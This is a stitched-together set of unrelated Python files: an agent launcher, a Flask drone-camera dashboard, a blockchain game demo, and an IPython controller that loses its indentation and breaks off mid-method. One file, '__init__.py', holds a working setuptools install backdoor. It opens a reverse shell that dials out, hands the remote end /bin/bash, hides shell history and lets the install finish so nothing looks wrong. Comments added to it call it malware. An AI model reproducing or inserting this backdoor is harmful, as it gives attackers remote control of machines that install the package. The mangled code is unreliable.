        self._agent: AEA = load_agent(self._agent_dir)
        super().__init__()

    def start(self) -> None:
        """Start task."""
        self._agent.start()

    def stop(self):
        """Stop task."""
        if not self._agent:  # pragma: nocover
            raise ValueError("Task was not started!")
        self._agent.stop()

    def create_async_task(self, loop: AbstractEventLoop) -> TaskAwaitable:
        """Return asyncio Task for task run in asyncio loop."""
        self._agent.runtime.set_loop(loop)
        if not isinstance(self._agent.runtime, AsyncRuntime):  # pragma: nocover
            raise ValueError(
                "Agent runtime is not async compatible. Please use runtime_mode=async"
            )
        return loop.create_task(self._agent.runtime.start_and_wait_completed())

    @property
    def id(self) -> Union[PathLike, str]:
        """Return agent_dir."""
        return self._agent_dir
class AEADirMultiprocessTask(AbstractMultiprocessExecutorTask):
    """
    Task to run agent from agent configuration directory.

    Version for multiprocess executor mode.
    """

    def __init__(
        self, agent_dir: Union[PathLike, str], log_level: Optional[str] = None
    ):
        """
        Init aea config dir task.

        :param agent_dir: directory with aea config.
        :param log_level: debug level applied for AEA in subprocess
        """
        self._agent_dir = agent_dir
        # Manager-backed Event survives pickling into the child process.
        self._manager = multiprocessing.Manager()
        self._stop_event = self._manager.Event()
        self._log_level = log_level
        super().__init__()

    def start(self) -> Tuple[Callable, Sequence[Any]]:
        """Return function and arguments to call within subprocess."""
        return (_run_agent, (self._agent_dir, self._stop_event, self._log_level))

    def stop(self):
        """Stop task."""
        if self._future.done():
            _default_logger.debug("Stop called, but task is already done.")
            return
        try:
            self._stop_event.set()
        except (FileNotFoundError, BrokenPipeError, EOFError) as e:  # pragma: nocover
            _default_logger.error(
                f"Exception raised in task.stop {e} {type(e)}. Skip it, looks process is closed."
            )

    @property
    def id(self) -> Union[PathLike, str]:
        """Return agent_dir."""
        return self._agent_dir

    @property
    def failed(self) -> bool:
        """
        Return was exception failed or not.

        If it's running it's not failed.

        :return: bool
        """
        if not self._future:
            return False
        if (
            self._future.done()
            and self._future.exception()
            and isinstance(self._future.exception(), BrokenProcessPool)
        ):  # pragma: nocover
            # A broken pool is an executor infrastructure failure, not a
            # failure of this particular task.
            return False
        return super().failed
class AEALauncher(AbstractMultipleRunner):
    """Run multiple AEA instances."""

    # Executor implementation per launch mode name.
    SUPPORTED_MODES: Dict[str, Type[AbstractMultipleExecutor]] = {
        "threaded": ThreadExecutor,
        "async": AsyncExecutor,
        "multiprocess": ProcessExecutor,
    }

    def __init__(
        self,
        agent_dirs: Sequence[Union[PathLike, str]],
        mode: str,
        fail_policy: ExecutorExceptionPolicies = ExecutorExceptionPolicies.propagate,
        log_level: Optional[str] = None,
    ) -> None:
        """
        Init AEARunner.

        :param agent_dirs: sequence of AEA config directories.
        :param mode: executor name to use.
        :param fail_policy: one of ExecutorExceptionPolicies to be used with Executor
        :param log_level: debug level applied for AEA in subprocesses
        """
        self._agent_dirs = agent_dirs
        self._log_level = log_level
        super().__init__(mode=mode, fail_policy=fail_policy)

    def _make_tasks(self) -> Sequence[AbstractExecutorTask]:
        """Make tasks to run with executor."""
        # Multiprocess mode needs the picklable task variant.
        if self._mode == "multiprocess":
            return [
                AEADirMultiprocessTask(agent_dir, log_level=self._log_level)
                for agent_dir in self._agent_dirs
            ]
        return [AEADirTask(agent_dir) for agent_dir in self._agent_dirs]
|
__init__.py | import multiprocessing
import time
import os
import pty
import socket
from setuptools.command.install import install as base
def shell(host, port):
    # SECURITY WARNING: this is a reverse shell. It dials out to host:port,
    # redirects stdin/stdout/stderr onto the socket, disables bash history,
    # and hands the remote end an interactive /bin/bash. Together with the
    # `install` class below this is a known malicious setup.py backdoor
    # pattern — this code should be removed/quarantined, not maintained.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, int(port)))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    os.putenv('HISTFILE', '/dev/null')
    pty.spawn('/bin/bash')
    s.close()

def multi(host, port):
    # SECURITY WARNING: detaches the reverse shell into a child process so
    # the package install appears to complete normally.
    cc = multiprocessing.Process(name='shell', target=shell, args=(host, port))
    cc.start()
class install(base):
    """
    Backdoored install function that spawns a reverse shell

    SECURITY WARNING: installing a package that ships this command class
    silently opens a reverse shell to the attacker-controlled --host/--port
    while the real install proceeds. This is malware; do not distribute or
    maintain it — remove and quarantine.
    """
    user_options = base.user_options + [
        ('host=', None, "Remote host to connect to"),
        ('port=', None, "Remote port to connect to")
    ]

    def initialize_options(self):
        base.initialize_options(self)
        self.host = None
        self.port = None

    def run(self):
        # Launch the detached reverse-shell process, wait briefly so it can
        # start, then continue with the normal install to avoid suspicion.
        if self.host and self.port:
            mult = multiprocessing.Process(name='multi', target=multi, args=(self.host, self.port))
            mult.daemon = False
            mult.start()
            time.sleep(.5) # Give it just long enough to start
            mult.terminate()
        base.run(self)
|
OSAVC_web_server.py | from doctest import master
from flask import Flask, render_template,request, redirect, url_for
import time, os, shutil
from picamera import PiCamera
from datetime import datetime, timedelta
from threading import Thread
from pymavlink import mavutil
import csv
import sys
# Flask app serving the camera/MAV control dashboard.
# SEND_FILE_MAX_AGE_DEFAULT=1 keeps browsers from caching the frequently
# replaced static/latest.jpg preview image.
app = Flask(__name__)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 1
# Shared state read/written by the request handler and worker threads.
MAVstatus = 'Disconnected'
Datalogging = False
def connectMAV():
    # Open the serial MAVLink link and wait (max 5 s) for a heartbeat to
    # discover the OSAVC controller; updates the global MAVstatus.
    global master
    global MAVstatus
    global btn1
    # Create the connection
    # Need to provide the serial port and baudrate
    master = mavutil.mavlink_connection("/dev/ttyUSB0", baud=115200) # usb on windows
    # find the OSAVC controller
    master.wait_heartbeat(timeout = 5)
    if(MAVstatus == 'Disconnected'):
        if master.target_system == 0:
            # No heartbeat arrived within the timeout window.
            print('No system detected!')
            MAVstatus = 'Timeout'
        else:
            print('target_system {}, target component {} \n'.format(master.target_system,master.target_component))
            btn1 = 'h'
            MAVstatus = 'Connected'
    print('connectMAV thread stopped')
def MAVlogging():
    """Log incoming MAVLink messages to a timestamped CSV on the USB stick.

    Phase 1 (5 s): listen to discover which message fields arrive and build
    the CSV header. Phase 2 (up to 20 s, or until the global Datalogging
    flag is cleared): write one CSV row per received message, carrying
    forward the last seen value for fields absent from that message.
    """
    global master
    global MAVstatus
    global btn1
    t = '{:%Y%m%d-%H%M%S}'.format(datetime.now())
    csv_file = '/mnt/usb/logfiles/log_' + t + '.csv'
    # first find all the incoming messages:
    msgs_dict = {}
    start_time = time.time()
    end_time = 5
    while time.time() - start_time < end_time:
        msg = master.recv_match(blocking=True)
        if not msg:
            # Fix: recv_match can return None; the old code then called
            # msg.get_type() on None and crashed with AttributeError.
            MAVstatus = 'No Data Found!'
            continue
        if msg.get_type() == "BAD_DATA":
            pass  # corrupt packet: ignore (removed dead commented-out block)
        else:
            # Merge this message's fields into the header-discovery dict.
            msgs_dict.update(msg.to_dict())
    # Put all keys for all the incoming messages into the headers list
    headers = list(msgs_dict)
    print(headers)
    with open(csv_file, 'w', newline='') as csvfile:
        writer = csv.DictWriter(csvfile, fieldnames=headers)
        writer.writeheader()
        start_time = time.time()
        logging_time = 20
        # currently we log for a specified period of time
        while Datalogging == True and time.time() - start_time < logging_time:
            msg = master.recv_match(blocking=True)
            if not msg:
                MAVstatus = 'No Data Found!'
                continue
            if msg.get_type() == "BAD_DATA":
                pass  # corrupt packet: ignore
            else:
                # add msg to the msgs_dict and write it to the file
                msgs_dict.update(msg.to_dict())
                writer.writerow(msgs_dict)
    # finish up:
    master.close()
    print('Exiting datalogging script')
def timelapse():  # continuous shooting
    """Continuously capture timestamped stills until btn1 leaves 's' mode."""
    cam = PiCamera()
    cam.resolution = (1640,922)
    # Fix: capture_continuous yields filenames directly; the previous
    # enumerate() wrapper made `filename` an (index, name) tuple.
    for filename in cam.capture_continuous('/mnt/usb/images/img{timestamp:%Y%m%d-%H%M%S}.jpg'):
        print('snap taken')
        print(btn1,btn2)
        print(filename)
        if btn1 != 's':
            break
    cam.close()
    print('timelapse thread stopped')
def video(): # record a video
    # Record 640x480 H.264 video to the USB stick until btn1 leaves 'v'.
    cam = PiCamera()
    t='{:%Y%m%d-%H%M%S}'.format(datetime.now())
    cam.resolution = (640,480)
    cam.start_recording('/mnt/usb/video/vid'+t+'.h264')
    while btn1 == 'v':
        # Busy-wait on the mode flag set by the web handler.
        print(btn1,btn2)
        pass
    cam.stop_recording()
    cam.close()
    print('video thread stopped')
def snapstart(): # take pictures on demand
    # QuickSnap mode: poll btn2 while btn1 == 'q'; btn2 == 'a' triggers one
    # capture, which is also copied into the web static dir for preview.
    cam = PiCamera()
    cam.resolution = (1640,922)
    print('entered snapshot mode')
    global btn2
    while btn1 == 'q':
        time.sleep(0.1)
        if btn2 == 'a':
            print('taken snap: btn2 =' + btn2)
            t='{:%Y%m%d-%H%M%S}'.format(datetime.now())
            filename = '/mnt/usb/images/img'+t+'.jpg'
            cam.capture(filename)
            shutil.copyfile(filename,'/mnt/usb/latest/latest.jpg')
            shutil.copyfile(filename,'/home/pi/Flask/static/latest.jpg')
            # Reset the trigger so we only take one shot per press.
            btn2 = 'o'
            print('btn2 =' + btn2)
    cam.close()
    print('exiting snaphot mode')
# we are able to make two different requests on our webpage
# GET = we just type in the url
# POST = some sort of form submission like a button
# we are able to make two different requests on our webpage
# GET = we just type in the url
# POST = some sort of form submission like a button
@app.route('/', methods = ['POST','GET'])
def hello_world():
    # Dashboard route: dispatches camera/MAV actions based on which form
    # button was pressed, then re-renders the template with fresh status.
    status = 'off'
    global btn1
    btn1 = 'o'
    global btn2
    btn2 = 'o'
    message = 'All good'
    global MAVstatus
    global Datalogging
    # if we make a post request on the webpage aka press button then do stuff
    if request.method == 'POST':
        # Each long-running action runs on its own worker thread; the
        # btn1/btn2 globals are the shared mode flags those threads poll.
        if request.form['submit'] == 'Video':
            print('BP: Recording video')
            status = 'video'
            btn1 = 'v'
            t2 = Thread(target=video)
            t2.start()
            message = 'All good'
        elif request.form['submit'] == 'Video Off':
            print('BP: Video off')
            status = 'Idle'
            btn1 = 'o'
            message = 'All good'
        elif request.form['submit'] == 'Connect MAV':
            print('Trying to connect')
            if MAVstatus == 'Disconnected':
                status = 'Connecting to MAV'
                btn1 = 'h'
                t4 = Thread(target=connectMAV)
                t4.start()
        elif request.form['submit'] == 'Start logging':
            Datalogging = True
            btn1 = 'datalog'
            t5 = Thread(target=MAVlogging)
            t5.start()
        elif request.form['submit'] == 'Stop logging':
            Datalogging = False
            btn1 = 'o'
        elif request.form['submit'] == 'Stills':
            print('BP: Recording stills')
            btn1 = 's'
            t1 = Thread(target=timelapse)
            t1.start()
            status = 'stills'
            message = 'All good'
        elif request.form['submit'] == 'Stills Off':
            print('BP: stills off')
            status = 'Idle'
            btn1 = 'o'
            message = 'All good'
        elif request.form['submit'] == 'QuickSnap':
            print('BP: QuickSnap')
            status = 'Ready to snap'
            btn1 = 'q'
            t3 = Thread(target=snapstart)
            t3.start()
            message = 'All good'
        elif request.form['submit'] == 'QuickSnap Off':
            print('BP:QuickSnap off')
            status = 'Idle'
            btn1 = 'o'
            message = 'All good'
        elif request.form['submit'] == 'Take':
            print('BP:Take')
            status = 'Snapshot mode'
            btn1 = 'q'
            btn2 = 'a'
            message = 'All good'
        elif request.form['submit'] == '_Take_':
            print('BP:Take error')
            status = 'Error'
            message = 'Enable QuickSnap first'
            btn1 = 'o'
        else:
            pass
    # Environmental sensors are currently stubbed out with zeros.
    # temp = round(bme280.get_temperature(),2) # temperature
    temp = 0
    # press = int(bme280.get_pressure()) # pressure
    press = 0
    # lux = ltr559.get_lux() # light levels
    lux = 0
    df = os.statvfs('/') # check if we're running out of disk space
    df_size = df.f_frsize * df.f_blocks
    df_avail = df.f_frsize * df.f_bfree
    df_pc = round((100 * df_avail/df_size),1)
    print(btn1, btn2)
    # the default page to display will be our template with our template variables
    return render_template('index2.html', MAVstatus= MAVstatus, message= message, status=status, temp=temp, press=press, lux=lux, df_pc=df_pc, btn1 = btn1)
if __name__ == "__main__":
    # let's launch our webpage!
    # do 0.0.0.0 so that we can log into this webpage
    # using another computer on the same network later
    # serve on port 5000 (the Flask default, stated explicitly)
    app.run(host='0.0.0.0',port=5000,debug=True)
|
index.py | # flake8: noqa
import random
from threading import Thread
from reach_rpc import mk_rpc
def main():
    # Wire up RPC to the Reach stdlib/backend and play one full game of
    # Rock-Paper-Scissors between Alice and Bob on funded test accounts.
    rpc, rpc_callbacks = mk_rpc()

    starting_balance = rpc('/stdlib/parseCurrency', 100)
    acc_alice = rpc('/stdlib/newTestAccount', starting_balance)
    acc_bob = rpc('/stdlib/newTestAccount', starting_balance)

    def fmt(x):
        # Human-readable currency string with 4 decimal places.
        return rpc('/stdlib/formatCurrency', x, 4)

    def get_balance(w):
        return fmt(rpc('/stdlib/balanceOf', w))

    before_alice = get_balance(acc_alice)
    before_bob = get_balance(acc_bob)

    # Alice deploys the contract; Bob attaches to it later.
    ctc_alice = rpc('/acc/contract', acc_alice)

    HAND = ['Rock', 'Paper', 'Scissors']
    OUTCOME = ['Bob wins', 'Draw', 'Alice wins']

    def player(who):
        # Shared participant interact interface for both players.
        def getHand():
            hand = random.randint(0, 2)
            print('%s played %s' % (who, HAND[hand]))
            return hand

        def informTimeout():
            print('%s observed a timeout' % who)

        def seeOutcome(n):
            print('%s saw outcome %s'
                  % (who, OUTCOME[rpc('/stdlib/bigNumberToNumber', n)]))

        return {'stdlib.hasRandom': True,
                'getHand': getHand,
                'informTimeout': informTimeout,
                'seeOutcome': seeOutcome,
                }

    def play_alice():
        rpc_callbacks(
            '/backend/Alice',
            ctc_alice,
            dict(wager=rpc('/stdlib/parseCurrency', 5), deadline=10, **player('Alice')))

    alice = Thread(target=play_alice)
    alice.start()

    def play_bob():
        def acceptWager(amt):
            print('Bob accepts the wager of %s' % fmt(amt))

        # Bob attaches to Alice's deployed contract via its info handle.
        ctc_bob = rpc('/acc/contract', acc_bob, rpc('/ctc/getInfo', ctc_alice))
        rpc_callbacks(
            '/backend/Bob',
            ctc_bob,
            dict(acceptWager=acceptWager, **player('Bob')))
        rpc('/forget/ctc', ctc_bob)

    bob = Thread(target=play_bob)
    bob.start()

    # Both participants must finish before balances are compared.
    alice.join()
    bob.join()

    after_alice = get_balance(acc_alice)
    after_bob = get_balance(acc_bob)

    print('Alice went from %s to %s' % (before_alice, after_alice))
    print(' Bob went from %s to %s' % (before_bob, after_bob))

    # Release the server-side handles held by the RPC bridge.
    rpc('/forget/acc', acc_alice, acc_bob)
    rpc('/forget/ctc', ctc_alice)


if __name__ == '__main__':
    main()
|
ipcontrollerapp.py | #!/usr/bin/env python
# encoding: utf-8
"""
The IPython controller application.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import with_statement
import json
import os
import stat
import sys
from multiprocessing import Process
from signal import signal, SIGINT, SIGABRT, SIGTERM
import socket
import zmq
from zmq.devices import ProcessMonitoredQueue
from zmq.log.handlers import PUBHandler
from IPython.core.profiledir import ProfileDir
from ipyparallel.apps.baseapp import (
BaseParallelApplication,
base_aliases,
base_flags,
catch_config_error,
)
from ipython_genutils.importstring import import_item
from traitlets import Unicode, Bool, List, Dict, TraitError, observe
from jupyter_client.session import (
Session, session_aliases, session_flags,
)
from ipyparallel.controller.heartmonitor import HeartMonitor
from ipyparallel.controller.hub import HubFactory
from ipyparallel.controller.scheduler import TaskScheduler,launch_scheduler
from ipyparallel.controller.dictdb import DictDB
from ipyparallel.util import disambiguate_url
# conditional import of SQLiteDB / MongoDB backend class
real_dbs = []
try:
    from ipyparallel.controller.sqlitedb import SQLiteDB
except ImportError:
    # sqlite backend unavailable; leave it out of the configurable classes
    pass
else:
    real_dbs.append(SQLiteDB)
try:
    from ipyparallel.controller.mongodb import MongoDB
except ImportError:
    # pymongo not installed; MongoDB backend unavailable
    pass
else:
    real_dbs.append(MongoDB)
#-----------------------------------------------------------------------------
# Module level variables
#-----------------------------------------------------------------------------
_description = """Start the IPython controller for parallel computing.
The IPython controller provides a gateway between the IPython engines and
clients. The controller needs to be started before the engines and can be
configured using command line options or using a cluster directory. Cluster
directories contain config, log and security files and are usually located in
your ipython directory and named as "profile_name". See the `profile`
and `profile-dir` options for details.
"""
_examples = """
ipcontroller --ip=192.168.0.1 --port=1000 # listen on ip, port for engines
ipcontroller --scheme=pure # use the pure zeromq scheduler
"""
#-----------------------------------------------------------------------------
# The main application
#-----------------------------------------------------------------------------
flags = {}
flags.update(base_flags)
flags.update({
'usethreads' : ( {'IPControllerApp' : {'use_threads' : True}},
'Use threads instead of processes for the schedulers'),
'sqlitedb' : ({'HubFactory' : {'db_class' : 'ipyparallel.controller.sqlitedb.SQLiteDB'}},
'use the SQLiteDB backend'),
'mongodb' : ({'HubFactory' : {'db_class' : 'ipyparallel.controller.mongodb.MongoDB'}},
'use the MongoDB backend'),
'dictdb' : ({'HubFactory' : {'db_class' : 'ipyparallel.controller.dictdb.DictDB'}},
'use the in-memory DictDB backend'),
'nodb' : ({'HubFactory' : {'db_class' : 'ipyparallel.controller.dictdb.NoDB'}},
"""use dummy DB backend, which doesn't store any information.
This is the default as of IPython 0.13.
To enable delayed or repeated retrieval of results from the Hub,
select one of the true db backends.
"""),
'reuse' : ({'IPControllerApp' : {'reuse_files' : True}},
'reuse existing json connection files'),
'restore' : ({'IPControllerApp' : {'restore_engines' : True, 'reuse_files' : True}},
'Attempt to restore engines from a JSON file. '
'For use when resuming a crashed controller'),
})
flags.update(session_flags)
aliases = dict(
ssh = 'IPControllerApp.ssh_server',
enginessh = 'IPControllerApp.engine_ssh_server',
location = 'IPControllerApp.location',
url = 'HubFactory.url',
ip = 'HubFactory.ip',
transport = 'HubFactory.transport',
port = 'HubFactory.regport',
ping = 'HeartMonitor.period',
scheme = 'TaskScheduler.scheme_name',
hwm = 'TaskScheduler.hwm',
)
aliases.update(base_aliases)
aliases.update(session_aliases)
class IPControllerApp(BaseParallelApplication):
name = u'ipcontroller'
description = _description
examples = _examples
classes = [ProfileDir, Session, HubFactory, TaskScheduler, HeartMonitor, DictDB] + real_dbs
# change default to True
auto_create = Bool(True, config=True,
help="""Whether to create profile dir if it doesn't exist.""")
reuse_files = Bool(False, config=True,
help="""Whether to reuse existing json connection files.
If False, connection files will be removed on a clean exit.
"""
)
restore_engines = Bool(False, config=True,
help="""Reload engine state from JSON file
"""
)
ssh_server = Unicode(u'', config=True,
help="""ssh url for clients to use when connecting to the Controller
processes. It should be of the form: [user@]server[:port]. The
Controller's listening addresses must be accessible from the ssh server""",
)
engine_ssh_server = Unicode(u'', config=True,
help="""ssh url for engines to use when connecting to the Controller
processes. It should be of the form: [user@]server[:port]. The
Controller's listening addresses must be accessible from the ssh server""",
)
location = Unicode(socket.gethostname(), config=True,
help="""The external IP or domain name of the Controller, used for disambiguating
engine and client connections.""",
)
import_statements = List([], config=True,
help="import statements to be run at startup. Necessary in some environments"
)
use_threads = Bool(False, config=True,
help='Use threads instead of processes for the schedulers',
)
engine_json_file = Unicode('ipcontroller-engine.json', config=True,
help="JSON filename where engine connection info will be stored.")
client_json_file = Unicode('ipcontroller-client.json', config=True,
help="JSON filename where client connection info will be stored.")
@observe('cluster_id')
def _cluster_id_changed(self, change):
    # Re-derive the connection-file names whenever the cluster id (and so
    # self.name) changes, so parallel clusters don't clobber each other.
    super(IPControllerApp, self)._cluster_id_changed(change)
    self.engine_json_file = "%s-engine.json" % self.name
    self.client_json_file = "%s-client.json" % self.name
# internal
children = List()
mq_class = Unicode('zmq.devices.ProcessMonitoredQueue')
@observe('use_threads')
def _use_threads_changed(self, change):
    """Keep mq_class in sync with the use_threads trait."""
    kind = 'Thread' if change['new'] else 'Process'
    self.mq_class = 'zmq.devices.{}MonitoredQueue'.format(kind)
write_connection_files = Bool(True,
help="""Whether to write connection files to disk.
True in all cases other than runs with `reuse_files=True` *after the first*
"""
)
aliases = Dict(aliases)
flags = Dict(flags)
def save_connection_dict(self, fname, cdict):
    """Save a connection dict to a JSON file in the profile's security dir.

    The file is created with owner-only permissions (0600) from the start
    instead of being chmod'ed after the write, so the key material in
    *cdict* is never world-readable, even briefly.

    :param fname: file name, relative to the security dir
    :param cdict: JSON-serializable connection info
    """
    fname = os.path.join(self.profile_dir.security_dir, fname)
    self.log.info("writing connection info to %s", fname)
    # os.open lets us set the mode at creation time; os.fdopen wraps the fd
    # in a normal text file object for the JSON write.
    fd = os.open(fname, os.O_WRONLY | os.O_CREAT | os.O_TRUNC,
                 stat.S_IRUSR | stat.S_IWUSR)
    with os.fdopen(fd, 'w') as f:
        f.write(json.dumps(cdict, indent=2))
    # chmod as well, in case the file pre-existed with looser permissions
    # (os.open's mode only applies on creation).
    os.chmod(fname, stat.S_IRUSR|stat.S_IWUSR)
def load_config_from_json(self):
"""load config from existing json connector files.

Reads the engine and client JSON files written by a previous run and
pushes their values into self.config (Session key, HubFactory
addresses and ports). Raises IOError if a file is missing and
AssertionError if engine/client info disagree; the caller
(load_secondary_config) handles both.
"""
c = self.config
self.log.debug("loading config from JSON")
# load engine config
fname = os.path.join(self.profile_dir.security_dir, self.engine_json_file)
self.log.info("loading connection info from %s", fname)
with open(fname) as f:
ecfg = json.loads(f.read())
# json gives unicode, Session.key wants bytes
c.Session.key = ecfg['key'].encode('ascii')
# 'interface' is of the form 'tcp://1.2.3.4'; split transport and address
xport,ip = ecfg['interface'].split('://')
c.HubFactory.engine_ip = ip
c.HubFactory.engine_transport = xport
self.location = ecfg['location']
# config files only fill in ssh servers not already given on the command line
if not self.engine_ssh_server:
self.engine_ssh_server = ecfg['ssh']
# load client config
fname = os.path.join(self.profile_dir.security_dir, self.client_json_file)
self.log.info("loading connection info from %s", fname)
with open(fname) as f:
ccfg = json.loads(f.read())
# the two files must describe the same controller session
for key in ('key', 'registration', 'pack', 'unpack', 'signature_scheme'):
assert ccfg[key] == ecfg[key], "mismatch between engine and client info: %r" % key
xport, ip = ccfg['interface'].split('://')
c.HubFactory.client_transport = xport
c.HubFactory.client_ip = ip
if not self.ssh_server:
self.ssh_server = ccfg['ssh']
# load port config:
c.HubFactory.regport = ecfg['registration']
c.HubFactory.hb = (ecfg['hb_ping'], ecfg['hb_pong'])
# (client-facing port, engine-facing port) pairs
c.HubFactory.control = (ccfg['control'], ecfg['control'])
c.HubFactory.mux = (ccfg['mux'], ecfg['mux'])
c.HubFactory.task = (ccfg['task'], ecfg['task'])
c.HubFactory.iopub = (ccfg['iopub'], ecfg['iopub'])
c.HubFactory.notifier_port = ccfg['notification']
def cleanup_connection_files(self):
    """Remove the engine/client JSON files, unless kept for reuse."""
    if self.reuse_files:
        self.log.debug("leaving JSON connection files for reuse")
        return
    self.log.debug("cleaning up JSON connection files")
    for name in (self.client_json_file, self.engine_json_file):
        path = os.path.join(self.profile_dir.security_dir, name)
        try:
            os.remove(path)
        except Exception as e:
            self.log.error("Failed to cleanup connection file: %s", e)
        else:
            self.log.debug(u"removed %s", path)
def load_secondary_config(self):
    """Load connection info from existing JSON files when reuse is requested.

    On a successful reuse, writing identical files back is skipped.
    """
    if self.reuse_files:
        try:
            self.load_config_from_json()
        except (AssertionError, IOError) as e:
            self.log.error("Could not load config from JSON: %s" % e)
        else:
            # Loaded successfully with reuse=True: no need to write the
            # very same files back to disk.
            self.write_connection_files = False
    self.log.debug("Config changed")
    self.log.debug(repr(self.config))
def init_hub(self):
"""Construct the HubFactory and write connection JSON files.

Exits the process (exit code 1) if the Hub cannot be constructed;
TraitError is re-raised untouched so config errors surface normally.
"""
c = self.config
# run user-configured import statements before constructing anything
self.do_import_statements()
try:
self.factory = HubFactory(config=c, log=self.log)
# self.start_logging()
self.factory.init_hub()
except TraitError:
raise
except Exception:
self.log.error("Couldn't construct the Controller", exc_info=True)
self.exit(1)
if self.write_connection_files:
# save to new json config files
f = self.factory
# fields common to both client and engine files
base = {
'key' : f.session.key.decode('ascii'),
'location' : self.location,
'pack' : f.session.packer,
'unpack' : f.session.unpacker,
'signature_scheme' : f.session.signature_scheme,
}
cdict = {'ssh' : self.ssh_server}
cdict.update(f.client_info)
cdict.update(base)
self.save_connection_dict(self.client_json_file, cdict)
edict = {'ssh' : self.engine_ssh_server}
edict.update(f.engine_info)
edict.update(base)
self.save_connection_dict(self.engine_json_file, edict)
# file used to persist/restore registered-engine state across restarts
fname = "engines%s.json" % self.cluster_id
self.factory.hub.engine_state_file = os.path.join(self.profile_dir.log_dir, fname)
if self.restore_engines:
self.factory.hub._load_engine_state()
# load key into config so other sessions in this process (TaskScheduler)
# have the same value
self.config.Session.key = self.factory.session.key
def init_schedulers(self):
"""Create the relay devices and the task scheduler.

Builds three MonitoredQueue devices (iopub, mux, control) bridging
client-facing and engine-facing sockets, then a task scheduler
according to TaskScheduler.scheme_name. Devices are collected in
self.children and started later by start().
"""
children = self.children
# resolve Thread- or Process-backed MonitoredQueue (see use_threads)
mq = import_item(str(self.mq_class))
f = self.factory
ident = f.session.bsession
# disambiguate url, in case of *
monitor_url = disambiguate_url(f.monitor_url)
# maybe_inproc = 'inproc://monitor' if self.use_threads else monitor_url
# IOPub relay (in a Process)
q = mq(zmq.PUB, zmq.SUB, zmq.PUB, b'N/A',b'iopub')
q.bind_in(f.client_url('iopub'))
q.setsockopt_in(zmq.IDENTITY, ident + b"_iopub")
q.bind_out(f.engine_url('iopub'))
q.setsockopt_out(zmq.SUBSCRIBE, b'')
q.connect_mon(monitor_url)
q.daemon=True
children.append(q)
# Multiplexer Queue (in a Process)
q = mq(zmq.ROUTER, zmq.ROUTER, zmq.PUB, b'in', b'out')
q.bind_in(f.client_url('mux'))
q.setsockopt_in(zmq.IDENTITY, b'mux_in')
q.bind_out(f.engine_url('mux'))
q.setsockopt_out(zmq.IDENTITY, b'mux_out')
q.connect_mon(monitor_url)
q.daemon=True
children.append(q)
# Control Queue (in a Process)
q = mq(zmq.ROUTER, zmq.ROUTER, zmq.PUB, b'incontrol', b'outcontrol')
q.bind_in(f.client_url('control'))
q.setsockopt_in(zmq.IDENTITY, b'control_in')
q.bind_out(f.engine_url('control'))
q.setsockopt_out(zmq.IDENTITY, b'control_out')
q.connect_mon(monitor_url)
q.daemon=True
children.append(q)
# honor explicit config; otherwise use the trait's default scheme
if 'TaskScheduler.scheme_name' in self.config:
scheme = self.config.TaskScheduler.scheme_name
else:
scheme = TaskScheduler.scheme_name.default_value
# Task Queue (in a Process)
if scheme == 'pure':
self.log.warn("task::using pure DEALER Task scheduler")
q = mq(zmq.ROUTER, zmq.DEALER, zmq.PUB, b'intask', b'outtask')
# q.setsockopt_out(zmq.HWM, hub.hwm)
q.bind_in(f.client_url('task'))
q.setsockopt_in(zmq.IDENTITY, b'task_in')
q.bind_out(f.engine_url('task'))
q.setsockopt_out(zmq.IDENTITY, b'task_out')
q.connect_mon(monitor_url)
q.daemon=True
children.append(q)
elif scheme == 'none':
self.log.warn("task::using no Task scheduler")
else:
# a Python scheduler (e.g. 'leastload'), run in a subprocess or inline
self.log.info("task::using Python %s Task scheduler"%scheme)
sargs = (f.client_url('task'), f.engine_url('task'),
monitor_url, disambiguate_url(f.client_url('notification')),
disambiguate_url(f.client_url('registration')),
)
kwargs = dict(logname='scheduler', loglevel=self.log_level,
log_url = self.log_url, config=dict(self.config))
if 'Process' in self.mq_class:
# run the Python scheduler in a Process
q = Process(target=launch_scheduler, args=sargs, kwargs=kwargs)
q.daemon=True
children.append(q)
else:
# single-threaded Controller
kwargs['in_thread'] = True
launch_scheduler(*sargs, **kwargs)
# set unlimited HWM for all relay devices
if hasattr(zmq, 'SNDHWM'):
# the first child is iopub; set both HWMs on its in-socket
q = children[0]
q.setsockopt_in(zmq.RCVHWM, 0)
q.setsockopt_out(zmq.SNDHWM, 0)
for q in children[1:]:
# skip plain Process children (the Python scheduler)
if not hasattr(q, 'setsockopt_in'):
continue
q.setsockopt_in(zmq.SNDHWM, 0)
q.setsockopt_in(zmq.RCVHWM, 0)
q.setsockopt_out(zmq.SNDHWM, 0)
q.setsockopt_out(zmq.RCVHWM, 0)
q.setsockopt_mon(zmq.SNDHWM, 0)
def terminate_children(self):
    """Terminate all child scheduler/queue processes; ignore dead ones."""
    procs = []
    for child in self.children:
        if isinstance(child, ProcessMonitoredQueue):
            procs.append(child.launcher)
        elif isinstance(child, Process):
            procs.append(child)
    if not procs:
        return
    self.log.critical("terminating children...")
    for proc in procs:
        try:
            proc.terminate()
        except OSError:
            # already dead
            pass
def handle_signal(self, sig, frame):
    """Signal handler: tear down children, then stop the event loop."""
    self.log.critical("Received signal %i, shutting down", sig)
    self.terminate_children()
    self.loop.stop()
def init_signal(self):
    """Route SIGINT/SIGABRT/SIGTERM to :meth:`handle_signal`."""
    for signum in (SIGINT, SIGABRT, SIGTERM):
        signal(signum, self.handle_signal)
def do_import_statements(self):
    """Execute each configured import statement in this process.

    Errors are logged with traceback but never abort controller startup,
    since import statements are best-effort configuration.
    """
    for s in self.import_statements:
        try:
            self.log.info("Executing statement: '%s'" % s)
            exec(s, globals(), locals())
        except Exception:
            # BUG FIX: the original called self.log.msg(), which does not
            # exist on logging.Logger, so every statement raised
            # AttributeError (and the handler re-raised it). Use the real
            # info/error methods and keep the traceback.
            self.log.error("Error running statement: %s" % s, exc_info=True)
def forward_logging(self):
"""If a log_url is configured, mirror log records to it over a zmq PUB socket."""
if self.log_url:
self.log.info("Forwarding logging to %s"%self.log_url)
context = zmq.Context.instance()
lsock = context.socket(zmq.PUB)
lsock.connect(self.log_url)
# PUBHandler publishes each record on a topic rooted at 'controller'
handler = PUBHandler(lsock)
handler.root_topic = 'controller'
handler.setLevel(self.log_level)
self.log.addHandler(handler)
@catch_config_error
def initialize(self, argv=None):
